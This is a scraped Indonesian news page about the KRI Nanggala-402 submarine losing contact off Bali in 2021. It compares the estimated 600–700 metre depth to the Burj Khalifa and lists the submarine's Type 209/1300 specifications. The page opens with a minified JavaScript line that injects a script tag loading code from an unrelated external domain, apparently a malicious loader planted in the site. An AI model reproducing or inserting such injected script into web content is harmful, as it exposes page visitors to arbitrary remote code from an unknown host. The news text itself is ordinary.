(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
NASIONAL

Kedalaman Hilangnya Kapal KRI Nanggala-402 Hampir Setinggi Burj Khalifa


KANALKALIMANTAN.COM – Kapal selam KRI Nanggala-402 dikabarkan hilang kontak di perairan Bali, pada Rabu (21/4/2021) lalu.

KRI Nanggala-402 membawa 53 personel terdiri dari 49 kru, satu komandan unit dan tiga personel persenjataan yang dikepalai oleh Letkol Marinir Heri Oktavianus.

TNI Angkatan Laut memperkirakan kapal selam KRI Nanggala-402 jatuh ke kedalaman antara 600 dan 700 meter.

Penyebab kapal hilang kontak diduga karena mengalami black out sehingga membuat kapal hilang kendali dan tak bisa muncul ke permukaan.

 

Baca Juga:
7 Jam Tenggelam di Sungai Martapura, Ramadhani Ditemukan Sudah Tak Bernyawa

Beberapa warganet mengatakan kedalaman hilangnya kapal KRI Nanggala-402 ini diperkirakan hampir setinggi gedung Burj Khalifa.

Salah satunya akun Twitter @afrkml. Dirinya memperkirakan bahwa kedalaman kapal selam KRI Nanggala-402 hampir setinggi Burj Khalifa.

Kedalaman kapal KRI Nanggala-402. (Twitter/sri_kpop_mul)

“Remuknya kapal selam Argentina ARA San Juan di kedalaman 600 meter aja kayak gini. Aku nggak bisa bayangin apa yang terjadi sama mereka di kedalaman 700 meter di laut Bali. Kedalamannya hampir setinggi Burj Khalifa,” cuitnya, dikutip Beritahits.id.

Hal serupa juga dicuitkan oleh akun Twitter @nyctophitae.

“Beneran nggak kebayang Ya Allah. 700 m itu hampir setinggi Burj Khalifa. Di video ini juga serem banget makhluk lautnya. Pasti gelap banget di sana,” ujarnya.

Baca Juga:
Vaksinasi Tahap Ketiga di Kalsel Target 38 Ribu, Sasar Lansia dan Guru

Burj Khalifa merupakan gedung tertinggi di dunia yang menjadi ikon kota Dubai di Uni Emirat Arab.

Ketinggian Burj Khalifa mencapai 828 meter atau sekitar 2.716,4 kaki. Ketinggian Burj Khalifa setara dengan tinggi tiga kali Menara Eiffel di Prancis.

Selain itu, bangunan Burj Khalifa hampir dua kali lebih tinggi dari Empire State Building, Amerika Serikat. Burj Khalifa juga menjadi bangunan yang dapat menembus awan sehingga membuat banyak orang kagum.

Spesifikasi KRI Nanggala-402

KRI Nanggala-402 dibuat galangan kapal Howaldt Deutsche Werke di Kiel, Jerman (Barat), pada tahun 1981 setelah kontrak efektif ditandatangani pada tahun 1977.

KRI Nanggala-402 memiliki saudara kembar, KRI Cakra-401, yang sama-sama dari Type 209/1300 – tipe kapal selam buatan HDW Jerman yang cukup banyak populasi di seluruh dunia.

Kapal selam tipe ini juga dibuat secara lisensi dan dikembangkan beberapa negara, di antaranya oleh Daewoo Shipbuilding and Marine Engineering di Korea Selatan yang menjadi kelas Changbo-Go.

Kapal selam buatan Korea Selatan ini juga dibeli Indonesia dalam skema yang semula adalah enam unit. Indonesia juga membangun kapal selam Changbo-Go ini di dermaga PT PAL, Surabaya. Tiga dari kapal selam kelas Changbo-Go ini telah hadir di Tanah Air, yaitu KRI Nagapasa-403, KRI Ardadedali-404, dan KRI Alugoro-405.

Baca juga: Kaget Semangkanya Diborong, “Pelita” Ramadhan Berlanjut ke Kertak Hanyar

Sebagai kapal selam yang berada di kelas menengah dengan sistem propulsi konvensional (nonnuklir), Type 209/1300 digerakkan motor listrik Siemens low-speed yang dayanya disalurkan secara langsung melalui suatu poros ke baling-baling kapal di buritan. Artinya, daya ini tidak memakai gear-gear mekanisme tambahan lain.

Adapun total daya yang mampu dihasilkan adalah 5 000 shaft horse power, sedangkan kehadiran baterai-baterai listriknya membuat dia mampu menyimpan daya listrik, yang dayanya disuplai empat generator mesin diesel MTU supercharged.

Baterai-baterai listrik itu mengambil sekitar 25 persen bobot total kapal selam yang secara keseluruhan adalah 1.395 ton (maka dinamai Type 209/1300 karena ada juga Type 209/1200 dan Type 209/1400). Secara dimensi, panjang keseluruhan Type 209/1300 adalah 59,5 meter, diameter luar 6,3 meter, dan diameter dalam 5,5 meter. (suara.com)


Al Ghifari

Recent Posts

SKPD Mengajar di SMPN 2 Banjarbaru, Wali Kota Aditya Ngajar Kelas Inspirasi

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin memulai program SKPD Instansi Mengajar dengan… Read More

38 menit ago

Pastikan Kehadiran Habib Syech ke Kapuas Bersholawat 27 Juni

KANALKALIMANTAN.COM, SOLO - Penjabat (Pj) Bupati Kapuas Erlin Hardi bersilaturahmi ke kediaman Habib Syech bin… Read More

51 menit ago

Ragam Kerajinan Rotan Merah Mejeng di Expo HUT ke-44 Dekranas

KANALKALIMANTAN.COM, SOLO - Kerajinan dari rotan merah menjadi salah satu primadona yang dihadirkan Dewan Kerajinan… Read More

1 jam ago

Pj Bupati Erlin Hardi Berdialog dengan Mahasiswa Kapuas di Yogya

KANALKALIMANTAN.COM, YOGYAKARTA - Penjabat (Pj) Bupati Kapuas Erlin Hardi berdialog dengan mahasiswa asal Kabupaten Kapuas… Read More

3 jam ago

Modus Pinjam Bendera Perusahaan Korupsi Proyek RS Kelua Tabalong

Empat Terdakwa Jalani Sidang, Satu Orang Mantan Kepala Dinas Kesehatan Read More

4 jam ago

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

17 jam ago

This website uses cookies.